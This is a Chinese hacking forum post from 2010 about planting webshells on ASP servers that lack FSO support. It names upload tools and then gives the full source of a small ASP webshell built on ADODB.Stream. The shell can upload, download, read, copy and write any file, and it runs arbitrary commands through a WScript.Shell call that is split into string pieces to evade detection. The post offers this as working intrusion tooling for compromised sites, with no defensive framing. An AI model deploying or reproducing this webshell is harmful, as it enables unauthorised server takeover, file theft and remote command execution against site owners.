|
|
最近几天老碰到不支持fso的,好不容易写入了大马,却没法列文件,列目录,郁闷呀,还是用一句话吧,一句话可以随便指定代码(用xmlhttp来写)。
这儿用的是lake2EvalClient-,来试试没有fso的网马吧,目标就是传不用fso读写文件的网马。
具体用一句话上传方法有两种:
1)使用“直接下载”即“uploadfile from url”
2)使用文件编辑,即"upload text file"
3)自己使用adostream来读写文件
另外一种方法:使用.net的aspx马就可以,本人测试。
最近还发现火狐站长助手2007的“文件上传模块”,批量上传都可以上传,那么就刚好上传.net的马aspxspy.aspx即可。
另外,火狐站长助手2007马“自定义执行ASP脚本”,也可以自己写入基于xmlhttp的文件读写代码来执行。(不用再嵌入<%%>)
另外,送几个免fso的小马webshell:
第一个:
01.<%@codepage=936%> 02.<% 03.If Err.Number=-214****1005 Then 04.Response.Write "<div align='center'>非常遗憾,您的主机不支持ADODB.Stream,不能使用本程序</div>" 05.Err.Clear 06.Response.End 07.end if%> 08.<%Response.Expires=0 09.on error resume next 10.if Request("up")=1 then 11.ScriptTimeOut=3000 12.Set tZ=Server.CreateObject("ADODB.Stream") 13.Set zh=Server.CreateObject("ADODB.Stream") 14.zh.Type=1 15.zh.Mode=3 16.zh.Open 17.zh.Write Request.BinaryRead(Request.TotalBytes) 18.zh.Position=0 19.RBD=zh.Read 20.bCrLf=ChrB(13)&ChrB(10) 21.'取得每个项目之间的分隔符 22.sSpace=MidB(RBD,1, InStrB(1,RBD,bCrLf)-1) 23.iStart=LenB(sSpace) 24.iFormStart=iStart+2 25.'找文件名 26.FNStart=InStrB(RBD,ChrB(AscB("f"))&ChrB(AscB("i"))&ChrB(AscB("l"))&ChrB(AscB("e"))&ChrB(AscB("n"))&ChrB(AscB("a"))&ChrB(AscB("m"))&ChrB(AscB("e"))&ChrB(AscB("="))&ChrB(AscB("""")))+10 27.FNEnd=InStrB(FNStart,RBD,ChrB(AscB(""""))) 28.Filepath=midB(RBD,FNStart,(FNEnd-FNStart)) 29.for a5=1 to lenb(Filepath) 30.fzfz=fz&chr(ascb(midb(Filepath,a5,1))) 31.next 32.FN=mid(fz,instrrev(fz,"\")+1) 33.if len(Server.URlEncode(FN))<1 then 34.FN="中文文件"&date&REPLACE(now,":","_")&(Timer()*100) 35.fileExtendName=mid(fz,instrrev(fz,".")) 36.FNFN=FN&fileExtendName 37.end if 38. 39.'分解项目 40.iInfoEnd=InStrB(iFormStart,RBD,bCrLf&bCrLf)+3 41.iFormStart=InStrB(iInfoEnd,RBD,sSpace)-1 42.tZ.Type=1 43.tZ.Mode=3 44.tZ.Open 45.zh.Position=iInfoEnd 46.zh.CopyTo tZ,iFormStart-iInfoEnd-2 47.if len(session("lp"))<2 then 48.response.redirect "up.asp" 49.else 50.tZ.savetofile session("lp")&"\"&FN,2 51.end if 52.tZ.close() 53.zh.close() 54.Set tZ=nothing 55.Set zh=nothing 56.lp=mid(session("lp"),instrrev(session("lp"),"\")+1)%> 57.<table border=0 width=100% align="left" cellspacing="0" cellpadding="0"> <%=FN%> 上传到: <%=session("lp")%>[<a href=# onclick=history.back( target=_blank)>继续上传</a>]<br></table></body> 58.<%else 59.on error resume next 60.if session("lp")="" then 61.session("lp")=server.mappath(".") 62.else 63.session("lp")=Request("h") 64.end if%> 65.<%'下载文件 66.function dl(f,n) 67.on error resume next 68.Set S=CreateObject("Adodb.Stream") 69.S.Mode=3 70.S.Type=1 71.S.Open 72.S.LoadFromFile(f) 73.if Err.Number>0 then 74.Response.Status="404" 75.else 76.Response.ContentType="application/octet-stream" 77.Response.AddHeader "Content-Disposition:","attachment;filename=" & n 78.Range=Mid(Request.ServerVariables("HTTP_RANGE"),7) 79.if Range="" then 80.Response.BinaryWrite(S.Read) 81.else 82.S.position=Clng(Split(Range,"-")(0)) 83.Response.BinaryWrite(S.Read) 84.End if 85.end if 86.Response.End 87.end function 88.if request.form("down")="down" then 89.f=request.form("f") 90.n=request.form("n") 91.call dl(f,n) 92.end if 93.%> 94.<form name=down method=post action=""> 95.<input name=f type=text value=源文件物理地址> 96.<input nname=n type=text value=保存的文件名> 97.<input name=down value=down type=submit> 98.</form> 99.<script language="javascript">function check(){if(kk.file1.value==""){alert("请选择上传的文件!");return false;}}</script> 100.<form name=kk enctype=multipart/form-data method=post action=?up=1> 101.<table border=0 width=100% align=left valign=top cellpadding=0 cellspacing=0> 102.<tr><td><br><input type=file name=file1> <input type=submit name=upload value=上传到:<%=session("lp")%>></form> 103.<form method=POST>上传:<input type=text name=h value=<%=session("lp")%>><input type=submit value=更改></form> 104.<%end if%> 105.<% 106.'读文件 107.function readfile(URL,chartype) 108.set srmObj = server.CreateObject("adodb.stream") 109.url=request.form("name") 110.srmObj.type=1 111.srmObj.mode=3 112.srmObj.open 113.srmObj.Position=0 114.srmObj.LoadFromFile URL 115.srmObj.Position = 0 116.srmObj.type=2 117.srmObj.charset=chartype 118.readfile=srmObj.readtext() 119.end function 120.if request.form("name")<>"" and request.form("name")<>"要读的文件物理地址" and request.form("ok")="read-copy-ren-write" then 121.response.write "<hr><pre>" & Server.HTMLEncode(readfile(url,"gb2312"))&"<hr>" 122.end if 123.%> 124.<%'复制并改名 125.On Error Resume Next 126.file1 = Request("file1") 127.file2 = Request("file2") 128.Set objStream = Server.CreateObject("ADODB.Stream") 129.objStream.Type = 1 ' adTypeBinary 130.objStream.Open 131.objStream.LoadFromFile file1 132.objStream.SaveToFile file2,2 133.%> 134.<% '写文件 135.on error resume next 136.set lcx=server.CreateObject("Adodb.Stream") 137.lcx.Open 138.lcx.Type=2 139.lcx.CharSet="gb2312" 140.lcx.LoadFromFile request.form("save") 141.lcxlcx.Position=lcx.Size 142.lcx.writetext request.form("text") 143.lcx.SaveToFile request.form("save"),2 144.lcx.Close 145.set lcx=nothing 146.%> 147.<form action="" method=post> 148.<input type=text namename=name value="当前文件地址:<%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>"> 149.<input type=text name=file1 value="要copy的源文件物理地址"><input type=text name=file2 value="目地地址文件可以改名"> 150.<input type=text name=save value="写入的文件全名"> 151.<textarea name=text>文件内容</textarea> 152.<input type=submit name=ok value="read-copy-ren-write"> 153.</form> 154.<%'如服务器不支持wscript.shell组件,请将以下代码全部删去%> 155.<form method="post"> 156.<input type=text name="cmd" size=60> 157.<input type=submit value="cmd"></form> 158.<textarea readonly cols=80 rows=20> 159.<%response.write server.createobject("ws"+"cr"+"ipt.s"+"hell").exec("c"+"md.exe /c "&request.form("cmd")).stdout.readall%> 160.</textarea> 161.</td></tr></table> 162.<br> 163.<CENTER><font color=red>本版本除了cmd命令用到了wscript.shell外,其它全部用adodb.stream写成 by lcx 2004 |
|
发表于 2010-9-29 10:21:44
